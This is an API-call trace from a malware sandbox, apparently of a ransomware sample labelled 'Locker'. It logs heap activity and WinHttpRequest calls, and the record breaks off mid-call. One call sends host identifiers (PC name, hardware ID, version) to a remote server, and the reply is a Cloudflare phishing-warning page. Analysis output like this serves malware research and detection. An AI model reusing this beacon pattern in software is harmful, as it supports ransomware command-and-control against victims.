ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0xd, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.930] ITypeInfo:LocalReleaseTypeAttr (This=0xc18e14) returned 0xdaa568 [0258.930] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.930] WinHttpRequest:IUnknown:Release (This=0xc18e14) returned 0x1 [0258.930] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x24) returned 0xded990 [0258.931] WinHttpRequest:IDispatch:Invoke (in: This=0xc02980, dispIdMember=5, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x7df550*(rgvarg=([0]=0xded994*(varType=0x8, wReserved1=0xde, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=NRb3JtBFp8rPDYQdL7tmn9VqyiL&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x7df518, puArgErr=0x7df560 | out: pDispParams=0x7df550*(rgvarg=([0]=0xded994*(varType=0x8, wReserved1=0xde, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=NRb3JtBFp8rPDYQdL7tmn9VqyiL&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x7df518*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x7df560*=0x2b5995) returned 0x0 [0259.169] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xceca78 | out: hHeap=0xbc0000) returned 1 [0259.169] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xd7a500 [0259.169] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xd7a5d8 [0259.169] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86718 [0259.169] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe04f0 | out: hHeap=0xbc0000) returned 1 [0259.169] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01928 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0259.170] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0259.170] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x90) returned 0xde1418 [0259.170] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xded990 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdb620 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0259.170] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdb620 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd7a500 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda258 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ad8 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda390 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6e90 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd7a5d8 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86718 | out: hHeap=0xbc0000) returned 1 [0259.170] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdb620 | out: hHeap=0xbc0000) returned 1 [0259.170] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0259.170] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xd86718 [0259.170] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdb620 [0259.171] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86738 [0259.171] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdb620 | out: hHeap=0xbc0000) returned 1 [0259.171] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e90 [0259.171] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdb620 [0259.171] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd866d8 [0259.171] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xceca78 [0259.171] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1a) returned 0xde7188 [0259.171] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc02980, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x7df468*="ResponseText", cNames=0x1, lcid=0x800, rgDispId=0x7df56c | out: rgDispId=0x7df56c*=9) returned 0x0 [0259.171] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde7188 | out: hHeap=0xbc0000) returned 1 [0259.171] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x14) returned 0xe233f8 [0259.171] WinHttpRequest:IDispatch:Invoke (in: This=0xc02980, dispIdMember=9, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x3, pDispParams=0x7df550*(rgvarg=0xe233fc, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x7df538, pExcepInfo=0x7df518, puArgErr=0x7df560 | out: pDispParams=0x7df550*(rgvarg=0xe233fc, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x7df538*(varType=0x8, wReserved1=0x7738, wReserved2=0xc, wReserved3=0x0, varVal1="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", varVal2=0xcd91a8), pExcepInfo=0x7df518*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x7df560*=0x2b5995) returned 0x0 [0259.178] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xceca78 | out: hHeap=0xbc0000) returned 1 [0259.178] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xd7a5f0 [0259.178] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1fb0) returned 0xe4ce88 [0259.178] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd866a8 [0259.178] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe233f8 | out: hHeap=0xbc0000) returned 1 [0259.178] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdb620 | out: hHeap=0xbc0000) returned 1 [0259.178] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd866d8 | out: hHeap=0xbc0000) returned 1 [0259.178] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdb620 [0259.178] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd7a5f0 | out: hHeap=0xbc0000) returned 1 [0259.178] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6e90 | out: hHeap=0xbc0000) returned 1 [0259.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86738 | out: hHeap=0xbc0000) returned 1 [0259.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86718 | out: hHeap=0xbc0000) returned 1 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e90 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xd7a5f0 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86718 [0259.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd7a5f0 | out: hHeap=0xbc0000) returned 1 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde7318 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xd7a5f0 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xd7a350 [0259.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdb620 | out: hHeap=0xbc0000) returned 1 [0259.179] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde7340 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdb620 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xd86738 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xd7a338 [0259.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86738 | out: hHeap=0xbc0000) returned 1 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xd7a368 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86738 [0259.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4050 [0259.179] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xfd2) returned 0xe48f20 [0259.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0xe48f20, cbMultiByte=4050, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", lpUsedDefaultChar=0x0) returned 4050 [0259.180] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd7a368 | out: hHeap=0xbc0000) returned 1 [0259.180] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xfe0) returned 0xe4ee40 [0259.180] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe48f20 | out: hHeap=0xbc0000) returned 1 [0259.180] GetLastError () returned 0x0 [0259.180] SetLastError (dwErrCode=0x0) [0259.180] GetLastError () returned 0x0 [0259.180] SetLastError (dwErrCode=0x0) [0259.180] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0xfd1, lpNumberOfBytesWritten=0x7dde70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7dde70, lpOverlapped=0x0) returned 0 [0259.180] GetLastError () returned 0x6 [0259.180] GetLastError () returned 0x6 [0259.180] SetLastError (dwErrCode=0x6) [0259.180] GetLastError () returned 0x6 [0259.180] SetLastError (dwErrCode=0x6) [0259.180] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe4ee40 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86738 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd7a338 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdb620 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde7340 | out: hHeap=0xbc0000) returned 1 [0259.181] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfb0d8 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde1418 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01928 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d78 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda690 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0259.181] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0259.181] WinHttpRequest:IUnknown:Release (This=0xc02980) returned 0x0 [0259.183] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfb120 | out: hHeap=0xbc0000) returned 1 [0259.183] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda498 | out: hHeap=0xbc0000) returned 1 [0259.183] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0259.183] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe258 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda660 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda678 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9dd8 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfb048 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0259.184] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9be0 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe078 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe190 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe4ce88 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd866a8 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd7a350 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd7a5f0 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde7318 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86718 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6e90 | out: hHeap=0xbc0000) returned 1 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0259.185] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xd86718 [0259.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e90 [0259.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0259.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xd866a8 [0259.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9be0 [0259.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd866a8 | out: hHeap=0xbc0000) returned 1 [0259.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x16) returned 0xceca58 [0259.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd866a8 [0259.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0259.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd866f8 [0259.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde7318 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86738 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x44) returned 0xdf56c0 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4c) returned 0xdcbe90 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde7250 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd866d8 [0259.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde7098 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcd9ad8 [0259.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde7318 | out: hHeap=0xbc0000) returned 1 [0259.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86738 | out: hHeap=0xbc0000) returned 1 [0259.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde7318 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86738 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86708 [0259.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86708 | out: hHeap=0xbc0000) returned 1 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde7048 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86708 [0259.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86748 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0259.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86708 | out: hHeap=0xbc0000) returned 1 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86708 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd866e8 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0259.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86708 | out: hHeap=0xbc0000) returned 1 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda660 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86708 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd866b8 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0259.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86708 | out: hHeap=0xbc0000) returned 1 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86708 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86728 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0259.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86708 | out: hHeap=0xbc0000) returned 1 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86708 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86758 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0259.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86708 | out: hHeap=0xbc0000) returned 1 [0259.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86708 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86768 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda498 [0259.188] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, 